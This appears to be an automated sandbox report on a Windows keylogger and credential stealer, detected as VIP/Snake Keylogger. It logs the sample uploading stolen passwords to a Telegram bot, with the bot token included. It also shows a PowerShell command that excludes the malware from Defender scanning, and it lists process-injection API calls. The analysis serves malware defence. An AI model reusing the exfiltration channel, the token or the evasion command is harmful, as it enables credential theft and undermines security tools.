                                                                                                            2025-01-10 22:08:08 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:08 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41028,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546888,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            48192.168.2.750033149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:09 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd7f79d79e94a6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:08:09 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 66 37 39 64 37 39 65 39 34 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd7f79d79e94a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:09 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41029,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546889,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            49192.168.2.750034149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:10 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8ddccaa63d3a385
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:08:10 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 63 63 61 61 36 33 64 33 61 33 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8ddccaa63d3a385Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:10 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41030,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546890,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            50192.168.2.750035149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:11 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8de095da994ecc8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:08:11 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 65 30 39 35 64 61 39 39 34 65 63 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8de095da994ecc8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:11 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:11 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:11 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41031,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546891,"document"


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:17:06:20
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x4a0000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:17:06:23
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff7fb730000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:162
                                                                                                              Total number of Limit Nodes:6
                                                                                                              execution_graph 40463 112d580 40464 112d5c6 GetCurrentProcess 40463->40464 40466 112d611 40464->40466 40467 112d618 GetCurrentThread 40464->40467 40466->40467 40468 112d655 GetCurrentProcess 40467->40468 40469 112d64e 40467->40469 40470 112d68b 40468->40470 40469->40468 40471 112d6b3 GetCurrentThreadId 40470->40471 40472 112d6e4 40471->40472 40455 112b218 40458 112b300 40455->40458 40456 112b227 40459 112b344 40458->40459 40460 112b321 40458->40460 40459->40456 40460->40459 40461 112b548 GetModuleHandleW 40460->40461 40462 112b575 40461->40462 40462->40456 40643 112d7c8 DuplicateHandle 40644 112d85e 40643->40644 40645 1124668 40646 112467a 40645->40646 40647 1124686 40646->40647 40649 1124778 40646->40649 40650 112479d 40649->40650 40654 1124878 40650->40654 40658 1124888 40650->40658 40651 11247a7 40651->40647 40655 11248af 40654->40655 40657 112498c 40655->40657 40662 11244b4 40655->40662 40657->40651 40659 11248af 40658->40659 40660 11244b4 CreateActCtxA 40659->40660 40661 112498c 40659->40661 40660->40661 40661->40651 40663 1125918 CreateActCtxA 40662->40663 40665 11259db 40663->40665 40473 77f6140 40474 77f5fe9 40473->40474 40477 77f5ff8 40474->40477 40478 77f75b1 40474->40478 40483 77f75c0 40474->40483 40479 77f75b4 40478->40479 40488 77f7666 40479->40488 40504 77f75f0 40479->40504 40480 77f75e7 40480->40477 40484 77f75c3 40483->40484 40486 77f7666 12 API calls 40484->40486 40487 77f75f0 12 API calls 40484->40487 40485 77f75e7 40485->40477 40486->40485 40487->40485 40489 77f75f4 40488->40489 40490 77f7669 40488->40490 40491 77f7622 40489->40491 40519 77f7baf 40489->40519 40525 77f7f33 40489->40525 40535 77f8178 40489->40535 40539 77f81bb 40489->40539 40544 77f801d 40489->40544 40549 77f7d81 40489->40549 40554 77f7ca1 40489->40554 40559 77f7de5 40489->40559 40564 77f7d47 40489->40564 40568 77f7ae7 40489->40568 40578 77f7b08 40489->40578 40583 77f7a2c 40489->40583 40490->40480 40491->40480 40505 77f75f4 40504->40505 40506 77f801d 2 API calls 40505->40506 40507 77f81bb 2 API calls 40505->40507 40508 77f8178 2 API calls 40505->40508 40509 77f7f33 4 API calls 40505->40509 40510 77f7622 40505->40510 40511 77f7baf 2 API calls 40505->40511 40512 77f7a2c 2 API calls 40505->40512 40513 77f7b08 2 API calls 40505->40513 40514 77f7ae7 4 API calls 40505->40514 40515 77f7d47 2 API calls 40505->40515 40516 77f7de5 2 API calls 40505->40516 40517 77f7ca1 2 API calls 40505->40517 40518 77f7d81 2 API calls 40505->40518 40506->40510 40507->40510 40508->40510 40509->40510 40510->40480 40511->40510 40512->40510 40513->40510 40514->40510 40515->40510 40516->40510 40517->40510 40518->40510 40520 77f7bc9 40519->40520 40521 77f8357 40520->40521 40588 77f56f8 40520->40588 40592 77f5700 40520->40592 40521->40491 40522 77f81e7 40526 77f7af0 40525->40526 40527 77f7afb 40526->40527 40528 77f7b02 40526->40528 40533 77f56f8 ResumeThread 40527->40533 40534 77f5700 ResumeThread 40527->40534 40596 77f5a38 40528->40596 40600 77f5a31 40528->40600 40529 77f81e7 40530 77f7ffe 40533->40529 40534->40529 40604 77f5948 40535->40604 40608 77f5941 40535->40608 40536 77f819c 40540 77f81c1 40539->40540 40542 77f56f8 ResumeThread 40540->40542 40543 77f5700 ResumeThread 40540->40543 40541 77f81e7 40542->40541 40543->40541 40545 77f8026 40544->40545 40547 77f5948 WriteProcessMemory 40545->40547 40548 77f5941 WriteProcessMemory 40545->40548 40546 77f808b 40546->40491 40547->40546 40548->40546 40550 77f7d91 40549->40550 40552 77f56f8 ResumeThread 40550->40552 40553 77f5700 ResumeThread 40550->40553 40551 77f81e7 40551->40551 40552->40551 40553->40551 40555 77f7ca7 40554->40555 40612 77f5888 40555->40612 40616 77f5880 40555->40616 40556 77f8114 40560 77f7e28 40559->40560 40620 77f57a8 40560->40620 40624 77f57b0 40560->40624 40561 77f7e43 40566 77f57a8 Wow64SetThreadContext 40564->40566 40567 77f57b0 Wow64SetThreadContext 40564->40567 40565 77f7d61 40566->40565 40567->40565 40569 77f7af0 40568->40569 40570 77f7b02 40569->40570 40572 77f7afb 40569->40572 40574 77f5a38 ReadProcessMemory 40570->40574 40575 77f5a31 ReadProcessMemory 40570->40575 40571 77f7ffe 40576 77f56f8 ResumeThread 40572->40576 40577 77f5700 ResumeThread 40572->40577 40573 77f81e7 40574->40571 40575->40571 40576->40573 40577->40573 40579 77f7b2b 40578->40579 40581 77f5948 WriteProcessMemory 40579->40581 40582 77f5941 WriteProcessMemory 40579->40582 40580 77f7e83 40580->40491 40581->40580 40582->40580 40584 77f7a32 40583->40584 40628 77f5bc5 40584->40628 40632 77f5bd0 40584->40632 40589 77f56fc ResumeThread 40588->40589 40591 77f5771 40589->40591 40591->40522 40593 77f5703 ResumeThread 40592->40593 40595 77f5771 40593->40595 40595->40522 40597 77f5a3b ReadProcessMemory 40596->40597 40599 77f5ac7 40597->40599 40599->40530 40601 77f5a34 ReadProcessMemory 40600->40601 40603 77f5ac7 40601->40603 40603->40530 40605 77f594b WriteProcessMemory 40604->40605 40607 77f59e7 40605->40607 40607->40536 40609 77f5944 WriteProcessMemory 40608->40609 40611 77f59e7 40609->40611 40611->40536 40613 77f588b VirtualAllocEx 40612->40613 40615 77f5905 40613->40615 40615->40556 40617 77f5884 VirtualAllocEx 40616->40617 40619 77f5905 40617->40619 40619->40556 40621 77f57ac Wow64SetThreadContext 40620->40621 40623 77f583d 40621->40623 40623->40561 40625 77f57b3 Wow64SetThreadContext 40624->40625 40627 77f583d 40625->40627 40627->40561 40629 77f5bc8 CreateProcessA 40628->40629 40631 77f5e1b 40629->40631 40633 77f5bd3 CreateProcessA 40632->40633 40635 77f5e1b 40633->40635 40636 77f88b0 40639 77f88b3 40636->40639 40637 77f8a3b 40639->40637 40640 77f4034 40639->40640 40641 77f8b30 PostMessageW 40640->40641 40642 77f8b9c 40641->40642 40642->40639

                                                                                                              Executed Functions

                                                                                                              Function 08C54117 Relevance: 8.9, Strings: 5, Instructions: 2604COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-921078497
                                                                                                              • Opcode ID: 74d81e7a46bf6c71b4c94fe464a4616c71d5c674e8ce0a2c1af396425d182601
                                                                                                              • Instruction ID: 932124931211db35b775cdf16062bd38895ac5d322939d0ec714a707bf7811ac
                                                                                                              • Opcode Fuzzy Hash: 74d81e7a46bf6c71b4c94fe464a4616c71d5c674e8ce0a2c1af396425d182601
                                                                                                              • Instruction Fuzzy Hash: D743D974A00219CFDB24DF68C888A9DB7B2BF88311F558599D859AB361CB31EDC2CF54
                                                                                                              Function 08C53668 Relevance: 7.0, Strings: 5, Instructions: 721COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$,q$,q$Hq
                                                                                                              • API String ID: 0-962059274
                                                                                                              • Opcode ID: b2ba363a27f78e573eea5ae5695ddfbd102e5000ed18221a0ee20923d3f7f3d9
                                                                                                              • Instruction ID: 668e5ed0258edd00cf01e217c56005d0465c8ffc0f639ddd89f65aa9d13f5dec
                                                                                                              • Opcode Fuzzy Hash: b2ba363a27f78e573eea5ae5695ddfbd102e5000ed18221a0ee20923d3f7f3d9
                                                                                                              • Instruction Fuzzy Hash: C0529035A00255DFDF18DF79C888AADB7B2BF85391B158159EC069B360CB31ED82CB94
                                                                                                              Function 08C51240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
